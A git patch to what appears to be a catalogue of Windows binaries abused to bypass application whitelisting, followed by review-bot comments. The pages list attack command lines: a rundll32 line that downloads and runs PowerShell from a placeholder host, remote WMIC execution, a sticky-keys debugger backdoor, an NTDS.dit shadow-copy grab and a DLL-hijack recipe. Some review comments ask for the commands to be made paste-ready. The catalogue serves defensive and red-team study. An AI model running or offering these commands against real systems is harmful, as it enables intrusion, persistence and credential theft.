From 610e5d7607d1d82d57939f59d5b8cbbef734dda7 Mon Sep 17 00:00:00 2001 From: api0cradle Date: Wed, 18 Apr 2018 23:45:36 +0200 Subject: [PATCH] Added some more adjustments --- OSBinaries/Installutil.md | 6 +-- OSBinaries/Msdt.md | 2 +- OSBinaries/Payload/Regsvr32_calc.sct | 23 +++++++++++ OSBinaries/Payload/Wmic_calc.xsl | 11 ++++++ OSBinaries/Regasm.md | 5 ++- OSBinaries/Regsvcs.md | 27 +++++++++++-- OSBinaries/Regsvr32.md | 24 +++++++++++- OSBinaries/Rundll32.md | 25 +++++++++++- OSBinaries/Runscripthelper.md | 18 +++++++++ OSBinaries/Syncappvpublishingserver.md | 18 +++++++++ OSBinaries/Wmic.md | 54 ++++++++++++++++++++++---- OSBinaries/Xwizard.md | 24 +++++++++++- 12 files changed, 216 insertions(+), 21 deletions(-) create mode 100644 OSBinaries/Payload/Regsvr32_calc.sct create mode 100644 OSBinaries/Payload/Wmic_calc.xsl diff --git a/OSBinaries/Installutil.md b/OSBinaries/Installutil.md index 79cf11b..2c94fdf 100644 --- a/OSBinaries/Installutil.md +++ b/OSBinaries/Installutil.md @@ -11,8 +11,8 @@ Acknowledgements: Code sample: -* [AllTheThingsX64.dll - Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll) -* [AllTheThingsX32.dll - Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx32.dll) +* [AllTheThingsX64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1] +* [AllTheThingsX32.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx32.dll)[1] Resources: * https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ @@ -31,7 +31,7 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe ``` Notes: - +[1]Code sample linked to Red Canary - Atomic Red Team diff --git a/OSBinaries/Msdt.md b/OSBinaries/Msdt.md index ef22dc7..b1ae961 100644 --- a/OSBinaries/Msdt.md +++ b/OSBinaries/Msdt.md 
@@ -10,7 +10,7 @@ Acknowledgements: * ? Code sample: -* [NameOfLink](Payload/NameOfPayload) +* Resources: * https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ diff --git a/OSBinaries/Payload/Regsvr32_calc.sct b/OSBinaries/Payload/Regsvr32_calc.sct new file mode 100644 index 0000000..74a556e --- /dev/null +++ b/OSBinaries/Payload/Regsvr32_calc.sct @@ -0,0 +1,23 @@ + + + + + + + + + + + + + + \ No newline at end of file diff --git a/OSBinaries/Payload/Wmic_calc.xsl b/OSBinaries/Payload/Wmic_calc.xsl new file mode 100644 index 0000000..b405524 --- /dev/null +++ b/OSBinaries/Payload/Wmic_calc.xsl @@ -0,0 +1,11 @@ + + + + + + \ No newline at end of file diff --git a/OSBinaries/Regasm.md b/OSBinaries/Regasm.md index ff15468..5684cb9 100644 --- a/OSBinaries/Regasm.md +++ b/OSBinaries/Regasm.md @@ -3,14 +3,15 @@ * Functions: Execute ``` -regasm.exe /U AllTheThings.dll +regasm.exe /U AllTheThingsx64.dll ``` Acknowledgements: * Casey Smith - @subtee Code sample: -* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1] +* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1] +* [AllTheThingsx86.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx86.dll)[1] Resources: * https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ diff --git a/OSBinaries/Regsvcs.md b/OSBinaries/Regsvcs.md index a638b9b..f631000 100644 --- a/OSBinaries/Regsvcs.md +++ b/OSBinaries/Regsvcs.md 
@@ -3,10 +3,29 @@ * Functions: Execute ``` -regsvcs.exe /U regsvcs.dll - -regsvcs.exe regsvcs.dll +regsvcs.exe AllTheThingsx64.dll ``` Acknowledgements: -* Casey Smith - @subtee \ No newline at end of file +* Casey Smith - @subtee + +Code sample: +* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1] +* [AllTheThingsx86.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx86.dll)[1] + +Resources: +* https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ +* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs +* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md +* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ + +Full path: +``` +C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe +C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe +C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe +``` + +Notes: +[1]Code sample linked to Red Canary - Atomic Red Team \ No newline at end of file diff --git a/OSBinaries/Regsvr32.md b/OSBinaries/Regsvr32.md index 95caa19..0152c5b 100644 --- a/OSBinaries/Regsvr32.md +++ b/OSBinaries/Regsvr32.md 
@@ -3,11 +3,33 @@ * Functions: Execute ``` -regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll +regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll + +regsvr32.exe /s /u /i:file.sct scrobj.dll ``` Acknowledgements: * Casey Smith - @subtee +Code sample: +* [Regsvr32_calc.sct](Payload/Regsvr32_calc.sct)[1] + +Resources: +* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md +* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ +* https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ + +Full path: +``` +C:\Windows\System32\regsvr32.exe +C:\Windows\SysWOW64\regsvr32.exe +``` + +Notes: +[1]Code sample linked to Red Canary - Atomic Red Team + + + + \ No newline at end of file diff --git a/OSBinaries/Rundll32.md b/OSBinaries/Rundll32.md index ef8047c..7adb1ca 100644 --- a/OSBinaries/Rundll32.md +++ b/OSBinaries/Rundll32.md @@ -3,6 +3,8 @@ * Functions: Execute ``` +rundll32.exe AllTheThingsx64,EntryPoint + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); 
@@ -37,6 +39,27 @@ Acknowledgements: * Jimmy - @bohops * Moriarty - @Moriarty_Meng * Adam - @hexacorn - + +Code sample: +* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1] +* [AllTheThingsx86.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx86.dll)[1] + +Resources: +* https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/ +* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7 +* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md +* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ + +Full path: +``` +C:\Windows\System32\rundll32.exe +C:\Windows\SysWOW64\rundll32.exe +``` + +Notes: +[1]Code sample linked to Red Canary - Atomic Red Team + + + \ No newline at end of file diff --git a/OSBinaries/Runscripthelper.md b/OSBinaries/Runscripthelper.md index eb0a89d..e3f56ad 100644 --- a/OSBinaries/Runscripthelper.md +++ b/OSBinaries/Runscripthelper.md @@ -9,4 +9,22 @@ runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.tx Acknowledgements: * Matt Graeber - @mattifestation +Code sample: +* + +Resources: +* https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc + +Full path: +``` +C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe +C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe +``` + +Notes: + + + + + \ No newline at end of file diff --git a/OSBinaries/Syncappvpublishingserver.md b/OSBinaries/Syncappvpublishingserver.md index 3278893..08e8a5b 100644 --- a/OSBinaries/Syncappvpublishingserver.md +++ b/OSBinaries/Syncappvpublishingserver.md 
@@ -8,3 +8,21 @@ SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http Acknowledgements: * Nick Landers - @monoxgas + +Code sample: +* + +Resources: +* https://twitter.com/monoxgas/status/895045566090010624 + +Full path: +``` +C:\Windows\System32\SyncAppvPublishingServer.exe +``` + +Notes: +Command injection into PowerShell +Might have been fixed in newest version of Windows 10. + + + diff --git a/OSBinaries/Wmic.md b/OSBinaries/Wmic.md index b8740a0..e3053e6 100644 --- a/OSBinaries/Wmic.md +++ b/OSBinaries/Wmic.md 
@@ -1,16 +1,56 @@ ## WMIC.exe -* Functions: Execute +* Functions: Reconnaissance, Execute, Read ADS ``` -wmic process call create calc +wmic process call create calc -wmic process get brief /format:"https://www.example.com/file.xsl - -wmic os get /format:"MYXSLFILE.xsl" - -wmic process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" +wmic process call create '"c:\ads\file.txt:program.exe"' + +wmic useraccount get /ALL + +wmic process get caption,executablepath,commandline + +wmic qfe get description,installedOn /format:csv + +wmic /node:"192.168.0.1" service where (caption like "%sql server (%") + +get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname" + +wmic /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" + +wmic /NODE: "192.168.0.1" process call create "evil.exe" + +wmic /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt" + +wmic /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit" + +wmic process get brief /format:"https://www.example.com/file.xsl" + +wmic os get /format:"MYXSLFILE.xsl" + +wmic process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" ``` Acknowledgements: * Casey Smith - @subtee + +Code sample: +* [Wmic_calc.xsl](Payloads/Wmic_calc.xls) + +Resources: +* https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory +* https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html +* https://twitter.com/subTee/status/986234811944648707 + +Full path: +``` +c:\windows\system32\wbem\wmic.exe +c:\windows\sysWOW64\wbem\wmic.exe +``` + +Notes: + + + + diff --git a/OSBinaries/Xwizard.md b/OSBinaries/Xwizard.md index 61754eb..1d9090a 100644 
--- a/OSBinaries/Xwizard.md +++ b/OSBinaries/Xwizard.md @@ -3,8 +3,28 @@ * Functions: DLL hijack ``` -xwizard.exe (xwizard.dll in same folder) +xwizard.exe ``` Acknowledgements: -* Adam - @Hexacorn \ No newline at end of file +* Adam - @Hexacorn + +Code sample: +* + +Resources: +* http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ + +Full path: +``` +c:\windows\system32\xwizard.exe +c:\windows\sysWOW32\xwizard.exe +``` + +Notes: +Need to copy out xwizard.exe to a user controlled folder. +If you add your own version of xwizard.dll it will execute when you start xwizard.exe. + + + +
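Review bot: The Installutil.md hunk links the 32-bit sample as `AllTheThingsx32.dll`, while the Regasm.md, Regsvcs.md and Rundll32.md hunks in the same patch link `AllTheThingsx86.dll` from the same Atomic Red Team `Payloads/AllTheThings` folder; only one of those file names can exist upstream, so check which URL resolves and use that name on all four pages. Minor: the new footnote line `[1]Code sample linked to Red Canary - Atomic Red Team` needs a space after the `[1]` marker (same in the Regsvcs.md, Regsvr32.md and Rundll32.md hunks).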
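Review bot: The Msdt.md hunk replaces the `[NameOfLink](Payload/NameOfPayload)` placeholder with a bare `* ` bullet under "Code sample:", which renders as an empty list item; the same empty bullet appears in the Runscripthelper.md, Syncappvpublishingserver.md and Xwizard.md hunks. Either leave the section out until a sample exists or put a short placeholder text after the bullet, as is done for the empty "Notes:" sections.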
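Review bot: The Regsvcs.md hunk drops the `regsvcs.exe /U regsvcs.dll` line and keeps only the no-switch form `regsvcs.exe AllTheThingsx64.dll`, while the Regasm.md hunk in the same patch documents only the `/U` form; registration and unregistration are two different entry points into the assembly, and both pages cite the same RegSvcsRegAsmBypass.cs reference, so keep both command lines here (`regsvcs.exe AllTheThingsx64.dll` and `regsvcs.exe /U AllTheThingsx64.dll`) rather than removing one.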
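Review bot: In the Regsvr32.md hunk the code sample `Regsvr32_calc.sct` is tagged `[1]` and the Notes footnote reads `[1]Code sample linked to Red Canary - Atomic Red Team`, but the link points to `Payload/Regsvr32_calc.sct`, a file added to this repository by the same patch, so the attribution is wrong; drop the `[1]` marker and the footnote on this page. Also, the new local variant `regsvr32.exe /s /u /i:file.sct scrobj.dll` omits the `/n` switch that the remote example line keeps; if the two are meant to be equivalent, make the switches consistent, otherwise say why they differ. The hunk also adds several blank `+` lines before "No newline at end of file"; trim them.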
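Review bot: The new line `rundll32.exe AllTheThingsx64,EntryPoint` in the Rundll32.md hunk omits the `.dll` extension used by the linked sample `AllTheThingsx64.dll`; write it as `rundll32.exe AllTheThingsx64.dll,EntryPoint` so readers can paste it against the downloaded file without guessing the name. As in the Regsvr32.md hunk, the trailing blank `+` lines before "No newline at end of file" should be removed.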
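Review bot: The two Full path entries in the Runscripthelper.md hunk are WinSxS component directories that embed a specific build and hash (`10.0.16299.15_none_c2df1bba78111118`, `10.0.16299.192_none_ad4699b571e00c4a`), so they will only match machines on exactly those builds; either state in Notes that the directory name varies with the installed build and updates, or give a pattern (`C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_*\Runscripthelper.exe`) instead of two literal paths. The "Notes:" section added here is empty and would be the natural place for that.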
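Review bot: The Notes line "Might have been fixed in newest version of Windows 10." in the Syncappvpublishingserver.md hunk is too vague to act on; name the build that was tested (or the one the linked tweet refers to), or leave the sentence out until it is confirmed. "Command injection into PowerShell" is a useful one-line summary and can stay.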
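Review bot: The Code sample link in the Wmic.md hunk is broken: it points to `Payloads/Wmic_calc.xls`, but the file added by this patch is `OSBinaries/Payload/Wmic_calc.xsl` (directory `Payload`, extension `.xsl`); fix both parts so the link resolves. Three more points in the same hunk: `get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname"` is a PowerShell cmdlet, not a WMIC.exe command line, and its switches use en dashes (`–class`) instead of ASCII hyphens, so it should be moved out of the wmic.exe block or clearly marked as the PowerShell equivalent and normalized to `-`; `wmic /user: /password: /node: process call create ...` has empty values after all three switches, so use visible placeholders (e.g. `/node:TARGET`) or mark it as a template; and "Read ADS" in the Functions line does not describe `wmic process call create '"c:\ads\file.txt:program.exe"'`, which executes a program stored in an alternate data stream rather than reading it, so "Execute from ADS" is the accurate label.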
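Review bot: The second Full path entry in the Xwizard.md hunk, `c:\windows\sysWOW32\xwizard.exe`, is a typo; the WOW64 directory is `SysWOW64`, as the Wmic.md hunk in this patch spells it. Also, since the command block was reduced to a bare `xwizard.exe` and the "(xwizard.dll in same folder)" hint moved to Notes, make the Notes say explicitly that the Full path entries are the locations to copy xwizard.exe from and that the hijack runs from the user-writable folder the copy and the attacker's xwizard.dll are placed in.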